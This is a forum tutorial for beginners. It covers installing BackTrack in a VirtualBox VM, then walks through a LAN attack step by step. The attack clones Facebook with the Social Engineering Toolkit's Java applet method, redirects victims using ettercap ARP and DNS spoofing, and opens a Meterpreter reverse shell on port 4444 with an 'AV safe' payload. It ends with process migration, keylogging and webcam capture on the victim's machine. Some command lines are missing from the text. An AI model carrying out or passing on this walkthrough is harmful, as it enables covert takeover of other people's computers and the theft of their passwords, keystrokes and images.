WHAT IS BACKTRACK?
This tutorial is an older one of mine. I decided to bring it back in the new backtrack subforum. NOTE: This works exactly the same as on backtrack 5r3.
For those of you who don’t know, backtrack is a huge compilation of hacking tools that you can use for various things including
– Sniffing password
– Hacking your entire LAN
– Infecting someone on LAN by redirecting there browser searches to your maching
– Taking control of computers on your LAN
– AND SO MUCH MORE!
In this tutorial, I am going to explain
-How to install backtrack
-Where/how to run it
-Show you some of my personal favourite tools and how to use them effectively!
First of all you must decide if you want to run backtrack on a USB flash drive, a Virtual Machine, or your own computer. For those of you who don’t know what these are:
A Virtual Machine is basically a program that takes a part of your computer and separates it from the rest of your computer so that you can run/test viruses, RATS or in this case, Backtrack from the separated part so that the virus doesn’t take over your whole computer or in this case, so you can keep your nice graphical OS (Operating system).
A USB flash drive is a seperate, portable hard drive that you plug into your computer. In this case, the USB will act as a Virtual Machine so that you can run backtrack separated from your OS.
Lastly (and this I highly recommend you don’t do) is to run Backtrack on your own computer.
HOW TO INSTALL BACKTRACK ON A VIRTUAL MACHINE (VM)
I recommend this method of running backtrack because it is the most convenient and you don’t have to go out and buy a USB stick. Also, if you use a USB stick and someone has to borrow it, the files can look a bit sketchy so it’s best to do it this way in my opinion.
Download backtrack from here and save it to your desktop.
(Note, this file is HUGE, so be patient. It can take a few hours to download it so go do something else while you wait)
Download VirtualBox (a free virtual machine) from here
(Note, this file is also quite big but not as big as backtrack)
Run VirtualBox and install it. I’m not going to walk you through that because the install of virtualbox is pretty self-explanatory
Start virtualbox, go to the top left corner and click the icon that says: NEW and click next.
Type in a name. I use the name – Backtrack 5r2 (or 5r3 if you downloaded that one). Select the operating system – Linux Ubuntu.
IMPORTANT – If you downloaded the 64 bit version of Backtrack, you must use Linux Ubuntu 64 bit. If you downloaded the 32 bit version, leave it as Linux Ubuntu.
Select the amount of RAM you want your VM to use. I would use as much as you are willing to give to the VM because many of the hacking programs in backtrack use lots of RAM or else they go really slow.
Click: Create a new hard disk and click next
Leave it as the top one (VDI)
Select dynamically allocated and click next
Select how much storage you want on this VM. I use 16 GB just to be safe but I don’t think that you need that much. 12 GB is the minimum if you want a safe, stable install
Click create until you are out of both windows
A “machine” should appear on the left hand side of the VirtualBox Window with your title. Click it, go to the top menu and click start.
You should get a black window and a window that says, welcome to the First Run Wizard.
Now it should say, select Installation Media. Hit the scroll bar and the name of the backtrack file you downloaded should be there. Select that and click next then click create.
Now a black window with white text should appear. Wait until it brings you to the red window titled, Backtrack live cd
Choose the first one (text version). It should bring you to another red window that says backtrack at the top. You should see a black window that is loading stuff. When it is done, type in startx.
This will bring you to the GUI of backtrack. I recommend using startx every time you start backtrack because the GUI is much more organized, nicer to look at and simpler to understand.
Anyways, there should be a little icon that says install backtrack. Double Click on that.
From there, you can basically click next until you’re out of there unless you see something that you don’t like. After that, you will see a window that says copying files. This will take a long time so be patient.
IMPORTANT – DON’T PANIC IF IT GETS STUCK AT A CERTAIN PERCENT. IT DOES THAT TO EVERYONE! JUST BE PATIENT AND WAIT!
After that, turn off the machine and then turn it on again.
Go into settings (right beside the start button) and click network (on the left side). Select – Attached to : Bridged Adapter. Select the router that is the name of your router.
This time after it loads, it’ll flash to the backtrack wallpaper for a while then back to the loading black window. This time (and from now on) you will have to enter a username and password to get into backtrack.
Username = root
Password = toor
When you type in the password, no text will show up even if you are typing. This is normal.
After that is done, once again use startx to go to the GUI (graphical user interface…basically a nicer looking version of the program).
CONGRATULATIONS, YOU HAVE SUCCESSFULLY INSTALLED BACKTRACK!
If you would like to learn how to use some of my personal favourite tools of this magnificent program, read on.
My favourite program by far is SET (which stands for social engineering toolkit). It’s super easy to use, and gives magnificent results.
There are multiple methods of using SET. The one I will explain to you is my favourite. Basically it will copy a website and make it so that when anyone on your network visits this website, they will go to your website instead with the virus on it! If you use this method, it’s best to use sites like facebook or other ones that people frequently use.
OK on with the tutorial.
In this method, we will be using:
– A terminal
– The Social Engineering Toolkit (SET)
First start SET by going to the top right of the backtrack window onto the “Applications button”, from there click “Exploitation Tools”, then “Social Engineering” and then click “set”. If there are two, click the top one.
Then we will type in 2 (Website Attack Vectors)
Please note that like I said SET is probably the easiest to use tool on backtrack. From this menu, you can experiment. I will explain some of the options here.
-Java Applet Attack – Clones a site then when someone visits the site, it prompts them to run a java file. Then it will infect the victim’s computer and you will be able to control it
-Metasploit Browser Exploit – This will use metasploit (my second favourite tool on backtrack) to create a server. When the victim’s computer connects to the server (by typing in your ip), they will be infected and you will be able to take control of their computer. This one is only ok because you have to somehow convince the victim to type in your ip in the address bar. Ex. 192.168.1.124:8080
-Credential Harvester Attack – This is probably the best one to use if you just want to get their facebook/gmail/whatever passwords. Basically it’ll clone a site login page. When people visit it (by typing in your ip address) they will see the login page and probably try to log in. Backtrack will copy what they typed in (their username and password) and send it back to you.
I will not explain the other ones as they are more complicated and not suited for a tut that was made for newbs.
Then we will wait for it to load. Once it loads it will bring up a menu with a bunch of options. We will type in “1” without the brackets
Then we will type in “1” (The Java Applet Attack Method).
It will then display some options. We will use number 2 (site cloner)
Type in the required information that it prompts you to enter.
When it asks which site you would like to clone, type in a site that you think your victims use a lot. Ex. http://www.facebook.com
When it asks to enter in your ip for the reverse connection, open up a terminal (on the main page of backtrack at the top, has a little picture of a black window) and type in
Look for your internet address. It should say something like 192.168.1.xxx. If it says something random like 10.0.2.15, it means that you are not connected to the internet properly and you should go back into the settings and try connecting to a different router.
When it asks if you use nat/portforwarding enter in no or n.
When it asks what port to run it on type in a random port. I use port 4444.
When it asks what payload to generate, use number 14 because it is AV safe (Anti-virus undetectable)
When it asks what type of meterpreter session to use (there will be 3 options) type in number 1
When all that is done, press enter and it will start doing it’s thing.
Meanwhile, we will open up a terminal and type in:
This will open up a file with a bunch of weird text on it.
Scroll down to the part near the top where it says “Microsoft Sucks”
You will see a part of it that says something like this
we need to change the microsoft.com’s to the website that the victim will be visiting (Ex. Facebook) and we need to change the ip addresses to the ip address that we got when we entered ifconfig.
Here is an example
This step is ESSENTIAL for any of this to work!
We will save the file by clicking the button at the top that says save, then we will close the window. We will then open up a new terminal and enter in
ettercap -Tqi eth0 -P dns_spoof -M ARP // //
Be sure to include all of the capitals and spaces. If this doesn’t work, then your wireless interface is different than mine.
Try this ONLY if the one above didn’t work
ettercap -Tqi wlan0 -P dns_spoof -M ARP // //
Press enter and wait until it starts generating a list of ip’s.
Go back to our SET terminal and see if it is done. It is done when it starts making a list of gibberish and says starting the payload handler.
Minimize all of this then go to http://www.facebook.com on your normal computer (or whatever site you used). (We are doing this to test if it works, this will work on any computer in your network) You should be prompted to run a java plugin. Run it this time and click run on the popup window. Then return to the SET terminal.
It should have started spouting a bunch of crap. Wait until it says, finished migrating or something along those lines. This means that you have successfully infected the victim’s computer.
To interact with the victim’s computer first type in
(That is an “L” by the way) This will list the sessions that we have on the victim’s computer. If there are more than one, that’s good. If there is only one, that is also fine. The more the better!
sessions -i 1
This will interact with the first session. You can substitute the 1 with another number if you want to interact with another sessions
BOOM! We now have control over the victim’s computer
Google meterpreter commands to see what you can do once at this stage.
To ensure that the victim stays infected, we are going to migrate our server to the explorer.exe task on the victim’s computer. This way, they can only get us out if they restart their computer or something.
To do this first type in
This will display all of the processes on the victim’s computer. You need to browse through all of that until you locate explorer.exe Look for the number beside it (it should be in the thousands) and remember it.
Go back down and type in
Ex. migrate 3968
Wait until it says migration completed successfully
You may now use commands for the meterpreter
3 useful commands are
keyscan_start (starts a keylogger)
keyscan_dump (shows you what they have typed)
webcam_snap (takes a picture with the webcam and saves it to the computer)
getuid (Shows you the name of the computer and the name of the user)
THIS IS JUST THE TIP OF THE ICEBERG! IF YOU ENJOYED THIS TUT OR FOUND IT USEFUL, PLEASE COMMENT.
ALSO DON’T HESITATE TO LET ME KNOW IF SOMETHING ISN’T WORKING FOR YOU OR ONE OF MY CODES HAS A TYPO OR SOMETHING.
THIS WAS NOT COPIED AND PASTED FROM ANOTHER USER, IT SEEMS THAT MY TUTORIAL ORIGINALITY IS OFTEN QUESTIONED, IF YOU COPY THIS, GIVE ME CREDIT AT LEAST!